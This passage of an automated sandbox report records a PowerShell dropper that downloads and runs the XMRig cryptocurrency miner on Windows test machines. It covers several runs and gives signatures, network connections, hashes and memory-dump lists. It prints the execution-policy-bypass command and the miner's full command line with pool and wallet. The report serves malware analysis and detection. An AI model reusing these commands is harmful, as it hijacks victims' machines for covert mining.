| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4160 wrote to memory of 3936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4160 wrote to memory of 3936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 52.111.227.11:443 | tcp |
Files
memory/4160-0-0x00007FFA68473000-0x00007FFA68475000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kck1ijhi.amx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4160-9-0x0000027B9F4B0000-0x0000027B9F4D2000-memory.dmp
memory/4160-10-0x00007FFA68470000-0x00007FFA68F32000-memory.dmp
memory/4160-11-0x00007FFA68470000-0x00007FFA68F32000-memory.dmp
memory/4160-12-0x00007FFA68470000-0x00007FFA68F32000-memory.dmp
memory/4160-14-0x0000027B9F540000-0x0000027B9F552000-memory.dmp
memory/4160-15-0x0000027B9F520000-0x0000027B9F52A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3936-46-0x000001EF5E950000-0x000001EF5E970000-memory.dmp
memory/3936-47-0x000001EF5E990000-0x000001EF5E9B0000-memory.dmp
memory/3936-48-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/4160-50-0x00007FFA68470000-0x00007FFA68F32000-memory.dmp
memory/3936-52-0x000001EF60280000-0x000001EF602A0000-memory.dmp
memory/3936-51-0x000001EF60260000-0x000001EF60280000-memory.dmp
memory/3936-49-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/4160-53-0x00007FFA68473000-0x00007FFA68475000-memory.dmp
memory/3936-54-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-55-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-57-0x000001EF60280000-0x000001EF602A0000-memory.dmp
memory/3936-56-0x000001EF60260000-0x000001EF60280000-memory.dmp
memory/3936-58-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-59-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-60-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-61-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-62-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-63-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-64-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-65-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-66-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-67-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-68-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-69-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-70-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-71-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-72-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-73-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-74-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-75-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-76-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-77-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-78-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-79-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-80-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-81-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-82-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-83-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-84-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-85-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-86-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-87-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-88-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-89-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-90-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-91-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-92-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-93-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-94-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-95-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-96-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-97-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-98-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-99-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-100-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-101-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-102-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-103-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-104-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-105-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-106-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-107-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-108-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-109-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-110-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-111-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-112-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-113-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-114-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-115-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
memory/3936-116-0x00007FF6A4DF0000-0x00007FF6A5A23000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:29
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3344 wrote to memory of 1256 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3344 wrote to memory of 1256 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4200,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=3444 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3472,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=2160 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
Files
memory/3344-0-0x00007FFF91693000-0x00007FFF91695000-memory.dmp
memory/3344-1-0x000001B9A1600000-0x000001B9A1622000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zhmgym4m.zc3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3344-11-0x00007FFF91690000-0x00007FFF92151000-memory.dmp
memory/3344-12-0x00007FFF91690000-0x00007FFF92151000-memory.dmp
memory/3344-14-0x00007FFF91690000-0x00007FFF92151000-memory.dmp
memory/3344-16-0x000001B9A1660000-0x000001B9A166A000-memory.dmp
memory/3344-15-0x000001B9A3B40000-0x000001B9A3B52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1256-47-0x0000011990120000-0x0000011990140000-memory.dmp
memory/1256-48-0x0000011990180000-0x00000119901A0000-memory.dmp
memory/1256-49-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/3344-50-0x00007FFF91693000-0x00007FFF91695000-memory.dmp
memory/3344-51-0x00007FFF91690000-0x00007FFF92151000-memory.dmp
memory/1256-53-0x00000119901C0000-0x00000119901E0000-memory.dmp
memory/1256-52-0x00000119901A0000-0x00000119901C0000-memory.dmp
memory/1256-54-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/3344-55-0x00007FFF91690000-0x00007FFF92151000-memory.dmp
memory/1256-56-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-58-0x00000119901A0000-0x00000119901C0000-memory.dmp
memory/1256-57-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-59-0x00000119901C0000-0x00000119901E0000-memory.dmp
memory/1256-60-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-61-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-62-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-63-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-64-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-65-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-66-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-67-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-68-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-69-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-70-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-71-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-72-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-73-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-74-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-75-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-76-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-77-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-78-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-79-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-80-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-81-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-82-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-83-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-84-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-85-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-86-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-87-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-88-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-89-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-90-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-91-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-92-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-93-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-94-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-95-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-96-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-97-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-98-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-99-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-100-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-101-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-102-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-103-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-104-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-105-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-106-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-107-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-108-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-109-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-110-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-111-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-112-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-113-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-114-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-115-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-116-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-117-0x00007FF702630000-0x00007FF703263000-memory.dmp
memory/1256-118-0x00007FF702630000-0x00007FF703263000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:32
Platform
win11-20240508-en
Max time kernel
1799s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3032 wrote to memory of 3876 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3032 wrote to memory of 3876 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/3032-0-0x00007FF886353000-0x00007FF886355000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qkqqyhb0.tx4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3032-9-0x000001A4A99E0000-0x000001A4A9A02000-memory.dmp
memory/3032-10-0x00007FF886350000-0x00007FF886E12000-memory.dmp
memory/3032-11-0x00007FF886350000-0x00007FF886E12000-memory.dmp
memory/3032-12-0x00007FF886350000-0x00007FF886E12000-memory.dmp
memory/3032-14-0x000001A4A9C90000-0x000001A4A9CA2000-memory.dmp
memory/3032-15-0x000001A4A9C70000-0x000001A4A9C7A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
